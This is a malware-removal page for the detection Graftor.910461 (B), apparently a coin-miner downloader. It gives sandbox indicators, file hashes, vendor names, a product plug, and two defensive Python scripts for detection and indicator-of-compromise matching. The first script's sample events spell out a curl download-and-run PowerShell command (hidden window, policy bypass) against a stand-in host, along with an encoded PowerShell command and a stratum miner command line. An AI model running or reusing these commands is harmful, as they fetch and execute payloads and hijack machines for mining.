Graftor.910461 (B) removal tips

Graftor.910461 (B) is a detection name that a number of antivirus vendors classify as malicious; several of them (ZoneAlarm, Fortinet) label the sample as a coin miner or miner downloader, and the sandbox run recorded a cryptomining command being executed. When this infection is active, you may notice unwanted processes in the Task Manager list, often with unusually high CPU usage. In this case, it is advised to scan your computer with GridinSoft Anti-Malware.

GridinSoft Anti-Malware

Removing malware manually may take hours and may damage your PC in the process. We recommend GridinSoft Anti-Malware for removal; it allows a complete scan and cleanup of your PC during the trial period. A 6-day free trial is available.

What can the Graftor.910461 (B) virus do?

The following behaviors were flagged when the sample was executed in a sandbox (the list reproduces the sandbox signature names; the first three are static or anti-analysis indicators, the rest are runtime behaviors):
  • SetUnhandledExceptionFilter detected (possible anti-debug)
  • Dynamic (imported) function loading detected
  • Reads data out of its own binary image
  • A process created a hidden window
  • An HTTP/S link was seen in a script or command line
  • Executed a very long command line or script command which may be indicative of chained commands or obfuscation
  • Authenticode signature is invalid
  • A scripting utility was executed
  • Uses Windows utilities for basic functionality
  • A cryptomining command was executed
  • Attempts to execute suspicious powershell command arguments
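Several of the runtime signatures above (HTTP/S link in a command line, very long or chained command line, scripting utility executed, suspicious PowerShell arguments, cryptomining command) are command-line heuristics that a defender can reproduce over process-creation telemetry. The script below is an added example written for this page; it is not code from the sandbox or from any vendor. The events in `SAMPLE_EVENTS` are constructed for the demonstration, the 512-character cutoff in `LONG_CMDLINE` is an assumed threshold (the sandbox's own cutoff is not given on the page), and the miner and PowerShell patterns are the author's choice of common indicators, not strings taken from the sample.

```python
import re

# Constructed sample process-creation events (not telemetry from the real sample).
SAMPLE_EVENTS = [
    {"pid": 412, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl https://example.invalid/payload.ps1 -o %TEMP%\p.ps1 "
                r"&& powershell -nop -w hidden -ep bypass -f %TEMP%\p.ps1"},
    {"pid": 418, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + "A" * 600},
    {"pid": 420, "image": r"C:\Users\Public\x.exe",
     "cmdline": "x.exe -o stratum+tcp://pool.example.invalid:3333 -u wallet --donate-level=1"},
    {"pid": 430, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe readme.txt"},
]

LONG_CMDLINE = 512   # assumed threshold for "very long command line"
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
CHAIN_RE = re.compile(r"&&|\|\||\s\|\s|;")              # cmd/PowerShell command chaining
SCRIPT_UTILS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
PS_SUSPICIOUS = [
    re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.IGNORECASE),     # base64 payload
    re.compile(r"-(?:nop|noprofile)\b", re.IGNORECASE),                # skip profile
    re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE),        # hidden window
    re.compile(r"-(?:ep|executionpolicy)\s+bypass\b", re.IGNORECASE),  # policy bypass
    re.compile(r"\b(?:iex|invoke-expression|downloadstring|frombase64string)\b", re.IGNORECASE),
]
MINER_RE = re.compile(r"stratum\+(?:tcp|ssl)://|--donate-level|\bxmrig\b|\bcryptonight\b",
                      re.IGNORECASE)


def classify(event):
    """Return the list of signature labels that fire for one process-creation event."""
    cmd = event["cmdline"]
    hits = []
    if URL_RE.search(cmd):
        hits.append("http_link_in_cmdline")
    if len(cmd) > LONG_CMDLINE or CHAIN_RE.search(cmd):
        hits.append("long_or_chained_cmdline")
    if event["image"].rsplit("\\", 1)[-1].lower() in SCRIPT_UTILS:
        hits.append("scripting_utility")
    if "powershell" in cmd.lower() and any(p.search(cmd) for p in PS_SUSPICIOUS):
        hits.append("suspicious_powershell_args")
    if MINER_RE.search(cmd):
        hits.append("cryptomining_command")
    return hits


def scan(events):
    """Map each pid to the signatures it triggered."""
    return {e["pid"]: classify(e) for e in events}


def suspicious_pids(events, min_hits=1):
    """Pids that triggered at least min_hits signatures, sorted for stable output."""
    return sorted(pid for pid, hits in scan(events).items() if len(hits) >= min_hits)


if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, hits or "-")
```

The miner pattern keys on the Stratum mining protocol URL scheme and XMRig-style options rather than on a process name, because the sample on this page carries generic version information ("Control A Software") and an invalid Authenticode signature, so its file name and metadata are not stable indicators.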

How to identify Graftor.910461 (B)?

The sample analyzed for this page has the properties below. Matching a suspicious file's hashes against these values is the reliable way to confirm it is the same sample; the version information is self-declared by the file, can be set to anything by its author, and should not be trusted on its own (the sample's Authenticode signature was invalid, as noted above).

File Info:

name: D3CE44AA2681EF93B4D5.mlw
path: /opt/CAPEv2/storage/binaries/1168cdc0d5a525c728fbfccd5d80e954f0da9da3fc2dd08a202b70670cfca58a
crc32: 17E57333
md5: d3ce44aa2681ef93b4d522b5483e47ef
sha1: 789dd25595dbcb22ab8decd58e40d95821196872
sha256: 1168cdc0d5a525c728fbfccd5d80e954f0da9da3fc2dd08a202b70670cfca58a
sha512: 02810487f8ee427672077f9a525c440a7e95f01c7f61ad284bdc3e0fc53d336696942ad4c6e237867d1e06bdcf5c1c493f585bb3329551bb6462e9631287301a
ssdeep: 98304:XbMbfPU4NBS2bB2FzJVxbD8AL+i9sGax2o0kxxl5gd+Ke:XbMzPU4rPbG7LGx2Wwd+N
type: PE32 executable (GUI) Intel 80386, for MS Windows
tlsh: T10546332236EB55B3D7F93C700B766E5984F5D13F82320D6BAB241300A8A29DD553ABC7
sha3_384: 0d411a7e1948cb4f93b660725894781954eb254dc3d0ff409d4cd20f78a480f0459fdd8c9ac40b964179b7762a4ff797
ep_bytes: 558bec6aff68a0964100683066410064
timestamp: 2016-04-02 22:14:17

Version Info:

Comments: Control A Software
CompanyName: Control A Software
FileDescription: Control A Software
LegalCopyright: Control A Software
LegalTrademarks: Control A Software
ProductName: Control A Software
FileVersion: 24.7.237
ProductVersion: 24.7.237
InternalName: Control A
OriginalFilename: Control A.exe
Translation: 0x0407 0x04b0
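To check a file against the indicators above you need the same hash set and the two header-derived fields (the COFF compile timestamp and the bytes at the entry point). The script below is an added example written for this page, not code from the sandbox or from any vendor. `GRAFTOR_IOCS` copies the values from the File Info section; `build_sample_pe` fabricates a minimal PE32 image so the parser can be exercised offline. That image is not the real sample, so its hashes will not match, but its timestamp and entry bytes are set to the page's values to show what a partial match looks like. The parser assumes `ep_bytes` means the first 16 bytes at the entry point, which is the length of the value on the page.

```python
import hashlib
import struct
import zlib
from datetime import datetime, timezone

# Indicators copied from the File Info section of this page.
GRAFTOR_IOCS = {
    "crc32": "17E57333",
    "md5": "d3ce44aa2681ef93b4d522b5483e47ef",
    "sha1": "789dd25595dbcb22ab8decd58e40d95821196872",
    "sha256": "1168cdc0d5a525c728fbfccd5d80e954f0da9da3fc2dd08a202b70670cfca58a",
    "ep_bytes": "558bec6aff68a0964100683066410064",
    "timestamp": "2016-04-02 22:14:17",
}
IMAGE_FILE_MACHINE_I386 = 0x14C
PE32_MAGIC = 0x10B
PAGE_TIMESTAMP_EPOCH = int(datetime(2016, 4, 2, 22, 14, 17, tzinfo=timezone.utc).timestamp())
PAGE_EP_BYTES = bytes.fromhex(GRAFTOR_IOCS["ep_bytes"])


def file_fingerprint(data: bytes) -> dict:
    """Compute the hash set the report lists (CRC32 as upper-case hex, the rest lower-case)."""
    return {
        "crc32": format(zlib.crc32(data) & 0xFFFFFFFF, "08X"),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha512": hashlib.sha512(data).hexdigest(),
        "sha3_384": hashlib.sha3_384(data).hexdigest(),
    }


def pe_info(data: bytes) -> dict:
    """Read machine type, PE32 magic, COFF TimeDateStamp and 16 bytes at the entry point."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    machine, nsect, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt_off = pe_off + 24                                     # optional header follows COFF header
    magic = struct.unpack_from("<H", data, opt_off)[0]
    ep_rva = struct.unpack_from("<I", data, opt_off + 16)[0]  # AddressOfEntryPoint
    ep_bytes = b""
    for i in range(nsect):                                    # map the RVA to a file offset
        sh = opt_off + opt_size + 40 * i
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, sh + 8)
        if vaddr <= ep_rva < vaddr + max(vsize, rawsize):
            start = rawptr + (ep_rva - vaddr)
            ep_bytes = data[start:start + 16]
            break
    return {
        "i386": machine == IMAGE_FILE_MACHINE_I386,
        "pe32": magic == PE32_MAGIC,
        "timestamp": datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "ep_bytes": ep_bytes.hex(),
    }


def ioc_matches(data: bytes, iocs: dict = GRAFTOR_IOCS) -> dict:
    """Compare every indicator in iocs with what the file actually shows."""
    observed = file_fingerprint(data)
    try:
        observed.update(pe_info(data))
    except ValueError:
        pass                                                  # not a PE: only hashes are compared
    return {k: str(observed.get(k, "")).lower() == v.lower() for k, v in iocs.items()}


def build_sample_pe(timestamp: int, entry_code: bytes) -> bytes:
    """Constructed minimal PE32 image (NOT the real sample) used only to exercise the parser."""
    pe_off, opt_size, raw_ptr = 0x40, 224, 0x200
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 1, timestamp, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x1000)                   # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)                 # ImageBase
    text = b".text".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", len(entry_code), 0x1000, 0x200, raw_ptr, 0, 0, 0, 0, 0x60000020)
    header = (dos + b"PE\0\0" + coff + bytes(opt) + text).ljust(raw_ptr, b"\0")
    return header + entry_code.ljust(0x200, b"\0")


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            data = f.read()
    else:
        data = build_sample_pe(PAGE_TIMESTAMP_EPOCH, PAGE_EP_BYTES)
    print(file_fingerprint(data))
    print(pe_info(data))
    print(ioc_matches(data))
```

Run it with a path to check a real file; with no argument it checks the constructed image, for which only `timestamp` and `ep_bytes` report True. A timestamp and entry-point match alone is weak evidence (both are easy to copy), so treat a file as the same sample only when the cryptographic hashes match as well.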

Graftor.910461 (B) is also detected under the following names (vendor: detection name):

Elastic: malicious (high confidence)
MicroWorld-eScan: Gen:Variant.Graftor.910461
ALYac: Gen:Variant.Graftor.910461
Cybereason: malicious.a2681e
APEX: Malicious
Avast: Win32:7Drop-D [Trj]
Ad-Aware: Gen:Variant.Graftor.910461
Emsisoft: Gen:Variant.Graftor.910461 (B)
BitDefenderTheta: Gen:NN.ZexaF.34182.@t3@a87Omzgi
Zillya: Trojan.Agent.Win32.1412561
FireEye: Gen:Variant.Graftor.910461
Sophos: Troj/Agent-BGQN
Jiangmin: Trojan.Alien.gk
Avira: HEUR/AGEN.1143645
Arcabit: Trojan.Graftor.DDE47D
ZoneAlarm: HEUR:Trojan-Downloader.Win32.Miner.gen
Microsoft: Trojan:Win32/Sabsik.FL.B!ml
Cynet: Malicious (score: 99)
Rising: Malware.AbnormalStub/SFX!1.D758 (CLASSIC)
SentinelOne: Static AI – Suspicious PE
Fortinet: W32/CoinMiner.910461!tr
AVG: Win32:7Drop-D [Trj]

How to remove Graftor.910461 (B)?

Graftor.910461 (B) removal tool
  • Download and install GridinSoft Anti-Malware.
  • Open GridinSoft Anti-Malware and perform a “Standard scan”.
  • Click “Move to quarantine” for all detected items.
  • Open the “Tools” tab and press “Reset Browser Settings”.
  • Select the affected browser and the desired options, then click “Reset”.
  • Restart your computer.

About the author

Paul Valéry

I'm a cyber security analyst and data science expert with 5+ years of experience with security software contractors.
